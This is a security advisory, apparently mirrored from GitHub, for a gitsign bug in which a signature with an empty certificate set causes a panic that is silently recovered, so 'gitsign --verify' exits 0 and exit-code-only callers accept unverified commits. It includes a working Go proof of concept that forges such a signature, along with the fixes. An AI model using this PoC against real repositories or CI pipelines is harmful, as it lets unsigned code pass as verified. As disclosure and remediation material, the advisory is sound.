Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
CertVerifier.Verify() in pkg/git/verifier.go unconditionally dereferences certs[0] after sd.GetCertificates() without checking the slice length. A CMS/PKCS7 signed message with an empty certificate set is a structurally valid DER payload; GetCertificates() returns an empty slice with no error, causing an immediate index-out-of-range panic. On the gitsign --verify code path (the GPG-compatible mode invoked by git verify-commit), the panic is silently recovered by internal/io/streams.go's Wrap() function, which returns nil instead of an error. main.go then exits with code 0, causing exit-code-only verification callers to interpret the failed verification as success.
Severity
Medium (CVSS 3.1: 5.8)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
- Attack Vector: Network - attacker pushes a commit carrying a crafted signature to any accessible repository, or delivers the signature file out-of-band
- Attack Complexity: Low - stripping certificates from a PKCS7 object requires only standard ASN.1 tooling
- Privileges Required: None - writing to an accessible repo (or creating a repo a victim clones) is sufficient
- User Interaction: Required - victim must run
git verify-commit,gitsign --verify, or an equivalent verification step - Scope: Unchanged
- Confidentiality Impact: None
- Integrity Impact: Low - exit-code-only callers (scripts, some CI pipelines) treat the panicked verification as success; git's own status-fd path checks for
GOODSIGand is therefore partially protected - Availability Impact: Low - the verification process aborts via panic on every invocation with such a signature
Affected Component
pkg/git/verifier.go-(*CertVerifier).Verify(line 114)internal/io/streams.go-(*Streams).Wrap(lines 71-84, the recovery that returns nil on panic)
CWE
- CWE-129: Improper Validation of Array Index
- CWE-390: Detection of Error Condition Without Action Taken (panic swallowed, nil returned)
Description
Unconditional index dereference after GetCertificates
CertVerifier.Verify() parses the incoming signature as CMS/PKCS7 and calls GetCertificates() to extract the signer's certificate before any signature math takes place:
// pkg/git/verifier.go:109-114
certs, err := sd.GetCertificates()
if err != nil {
return nil, fmt.Errorf("error getting signature certs: %w", err)
}
cert := certs[0] // panic: index out of range if certs is emptyGetCertificates() delegates to sd.psd.X509Certificates() (the upstream smimesign/ietf-cms library). RFC 5652 §5.1 marks the certificates field in SignedData as OPTIONAL, and an empty or absent set is a structurally valid CMS message. The library returns (nil, nil) or ([]*, nil) for such a message - an empty slice with no error - so the length check on err is irrelevant:
// internal/fork/ietf-cms/signed_data.go:53-55
func (sd *SignedData) GetCertificates() ([]*x509.Certificate, error) {
return sd.psd.X509Certificates() // returns ([], nil) for empty cert set
}There is no length guard anywhere between GetCertificates() and the certs[0] dereference.
Panic recovery silently returns exit 0
All root-command invocations (including gitsign --verify, which git calls for verify-commit) are wrapped by (*Streams).Wrap:
// internal/commands/root/root.go:69-95
RunE: func(cmd *cobra.Command, args []string) error {
s := io.New(o.Config.LogPath)
defer s.Close()
return s.Wrap(func() error { // panic recovery is here
...
case o.FlagVerify:
return commandVerify(o, s, args...)
...
})
},Wrap uses a bare recover() inside a defer:
// internal/io/streams.go:71-84
func (s *Streams) Wrap(fn func() error) error {
defer func() {
if r := recover(); r != nil {
fmt.Fprintln(s.TTYOut, r, string(debug.Stack()))
// ← no named return, no assignment; Wrap returns nil
}
}()
if err := fn(); err != nil {
fmt.Fprintln(s.TTYOut, err)
return err
}
return nil
}In Go, a recover() in a defer does not modify the enclosing function's return value unless named returns are used. When fn() panics, the defer fires, prints the panic message and stack trace to TTYOut, and then Wrap returns the zero value for error - which is nil.
main.go then sees nil from rootCmd.Execute() and exits 0:
// main.go:37-39
if err := rootCmd.Execute(); err != nil {
os.Exit(1) // NOT reached
}
// process falls through → exit 0GPG status-fd provides partial protection for git verify-commit
git verify-commit passes --status-fd=1 to gitsign. The GPG status protocol requires GOODSIG in the status output for git to treat the signature as valid. In commandVerify, EmitGoodSig is only called after v.Verify() succeeds:
// internal/commands/root/verify.go:49-90
gpgout.Emit(gpg.StatusNewSig) // written before verification
summary, err := v.Verify(ctx, data, sig, true) // PANIC here
// lines below never reached:
gpgout.EmitGoodSig(summary.Cert)
gpgout.EmitTrustFully()Because the panic fires inside v.Verify(), only NEWSIG (not GOODSIG) is written to the status-fd. Modern git reads this output and still considers the commit unverified. However, scripts and CI tools that check only the exit code of gitsign --verify see exit 0 and consider verification successful.
Execution chain to impact
- Attacker strips all certificates from a valid gitsign PKCS7 signature using
sd.SetCertificates([]*x509.Certificate{})and re-serializes the message. - Attacker attaches this certificate-free signature as the
gpgsigfield of a commit and pushes it to an accessible repository (or delivers the.pemfile directly). - Victim runs
gitsign --verify <sig> <data>orgit verify-commit <commit>(which internally invokesgitsign --verify). CertVerifier.Verify()panics atcerts[0]withindex out of range [0] with length 0.Wrap()recovers the panic and returns nil; process exits 0.- Any caller that checks only the exit code considers verification successful.
Proof of Concept
// make_bad_sig.go - run from repo root: go run ./make_bad_sig.go
// Then: go run main.go --verify /tmp/gitsign-badsig.pem /tmp/gitsign-data.bin; echo "exit: $?"
package main
import (
"crypto/x509"
"encoding/pem"
"fmt"
"io"
"os"
"github.com/go-git/go-git/v5/plumbing"
"github.com/go-git/go-git/v5/plumbing/object"
"github.com/go-git/go-git/v5/storage/memory"
cms "github.com/sigstore/gitsign/internal/fork/ietf-cms"
)
func main() {
raw, err := os.ReadFile("internal/e2e/testdata/offline.commit")
if err != nil {
panic(err)
}
st := memory.NewStorage()
obj := st.NewEncodedObject()
obj.SetType(plumbing.CommitObject)
w, _ := obj.Writer()
_, _ = w.Write(raw)
_ = w.Close()
c, err := object.DecodeCommit(st, obj)
if err != nil {
panic(err)
}
blk, _ := pem.Decode([]byte(c.PGPSignature))
if blk == nil {
panic("no pem block in commit signature")
}
sd, err := cms.ParseSignedData(blk.Bytes)
if err != nil {
panic(err)
}
// Strip all certificates from the SignedData
if err := sd.SetCertificates([]*x509.Certificate{}); err != nil {
panic(err)
}
der, err := sd.ToDER()
if err != nil {
panic(err)
}
badSig := pem.EncodeToMemory(&pem.Block{Type: "SIGNED MESSAGE", Bytes: der})
mo := new(plumbing.MemoryObject)
_ = c.EncodeWithoutSignature(mo)
r, _ := mo.Reader()
data, _ := io.ReadAll(r)
_ = os.WriteFile("/tmp/gitsign-badsig.pem", badSig, 0644)
_ = os.WriteFile("/tmp/gitsign-data.bin", data, 0644)
fmt.Println("Wrote /tmp/gitsign-badsig.pem and /tmp/gitsign-data.bin")
}Expected output after go run main.go --verify /tmp/gitsign-badsig.pem /tmp/gitsign-data.bin; echo "exit: $?":
runtime error: index out of range [0] with length 0
goroutine 1 [running]:
runtime/debug.Stack(...)
...
github.com/sigstore/gitsign/pkg/git.(*CertVerifier).Verify(...)
pkg/git/verifier.go:114 +0x...
...
exit: 0 ← process exits 0 despite verification failureImpact
- Authentication bypass for exit-code callers: Any script or CI pipeline running
gitsign --verifyand checking only$?will treat the panicked verification as a success (exit 0). This allows an attacker to make a commit appear verified without a valid signature. - Denial of service: Every verification attempt against a crafted signature panics, preventing legitimate verification output from being produced.
- Misleading output: The panic stack trace is written to TTYOut (stderr in non-TTY environments), which may be silently discarded by callers that redirect stderr.
- Partial bypass of git verify-commit: git itself is protected by the
GOODSIGcheck on the status-fd; however, the exit-code bypass affects auxiliary tooling that wrapsgitsign --verifydirectly.
Recommended Remediation
Option 1: Guard the slice access (preferred - lowest layer, protects all callers)
Add an explicit length check in CertVerifier.Verify() immediately after GetCertificates():
// pkg/git/verifier.go - replace lines 110-114
certs, err := sd.GetCertificates()
if err != nil {
return nil, fmt.Errorf("error getting signature certs: %w", err)
}
if len(certs) == 0 {
return nil, fmt.Errorf("no certificates found in signature")
}
cert := certs[0]This produces a clean error at the source instead of a panic, propagated through commandVerify as a non-nil return, so Wrap returns it, Execute() returns it, and main.go exits 1.
Option 2: Return an error instead of nil on panic recovery
Fix Wrap() to return an error when it recovers a panic, so that all callers reliably see a non-zero exit code:
// internal/io/streams.go - replace Wrap with named return
func (s *Streams) Wrap(fn func() error) (retErr error) {
defer func() {
if r := recover(); r != nil {
fmt.Fprintln(s.TTYOut, r, string(debug.Stack()))
retErr = fmt.Errorf("panic: %v", r) // propagate as error
}
}()
if err := fn(); err != nil {
fmt.Fprintln(s.TTYOut, err)
return err
}
return nil
}This is a defense-in-depth fix. It ensures that any future panic in a command results in exit 1 rather than 0. Option 1 should be applied regardless; Option 2 prevents similar bypass bugs from any other panic source.
Credit
This vulnerability was discovered and reported by bugbunny.ai.
AnalysisAI
Authentication bypass in gitsign --verify allows attackers to make unsigned or invalid commits appear verified when callers check only exit codes. CertVerifier.Verify() unconditionally dereferences the first certificate from a PKCS7 signature without validating that certificates exist; a crafted signature with an empty certificate set causes an index-out-of-range panic that is silently recovered by internal error handling, returning exit code 0 instead of an error. Exit-code-only verification callers (scripts, CI pipelines) misinterpret this panic as successful verification, while git's own status-fd verification path is partially protected by checking for the GOODSIG status token. The vulnerability affects gitsign versions 0.4.0 through 0.14.x; confirmed actively exploited is not indicated, but a working proof-of-concept exists in the advisory.
Technical ContextAI
gitsign is a GPG-compatible signing and verification tool for Git commits that uses CMS/PKCS7 signatures and certificate-based verification. The vulnerability exists in two layers: first, pkg/git/verifier.go's CertVerifier.Verify() method calls sd.GetCertificates() which delegates to the upstream smimesign/ietf-cms library (RFC 5652 compliant). RFC 5652 §5.1 marks the certificates field in SignedData as OPTIONAL, allowing structurally valid CMS messages with empty certificate sets. The library correctly returns an empty slice with no error ([]*, nil) for such messages, but CertVerifier fails to validate slice length before indexing certs[0], triggering CWE-129 (improper array index validation). Second, the panic is caught by internal/io/streams.go's Wrap() function, which uses bare recover() in a defer without named return values, causing Go to return the zero error value (nil) instead of propagating the panic as an error. This violates CWE-390 (error condition detected but not acted upon). The CPE pkg:go/github.com/sigstore/gitsign identifies the affected Go module.
RemediationAI
Upgrade to gitsign version 0.15.0 or later, which includes the fix to guard the slice access in pkg/git/verifier.go by adding an explicit length check before indexing certs[0]. The recommended patch adds the validation: if len(certs) == 0 { return nil, fmt.Errorf("no certificates found in signature") } immediately after GetCertificates() returns, ensuring a clean error propagates to the caller instead of a panic. This fix should be applied regardless of the panic-recovery defense-in-depth option (hardening Wrap() to return an error on panic recovery) because it prevents the root cause at the source. Workaround for users unable to upgrade immediately: configure CI/CD pipelines and verification scripts to reject any commit where gitsign --verify produces a panic stack trace (check for 'index out of range' or 'panic:' in stderr), or switch to git verify-commit status-fd parsing (check for GOODSIG token) rather than exit code alone. Note that the workaround is imperfect and does not eliminate the underlying vulnerability. See advisory https://github.com/sigstore/gitsign/security/advisories/GHSA-7c37-gx6w-8vc5 for full details.
Same weakness CWE-129 – Improper Validation of Array Index
View allSame technique Authentication Bypass
View allVendor StatusVendor
SUSE
Severity: MediumShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30564
GHSA-7c37-gx6w-8vc5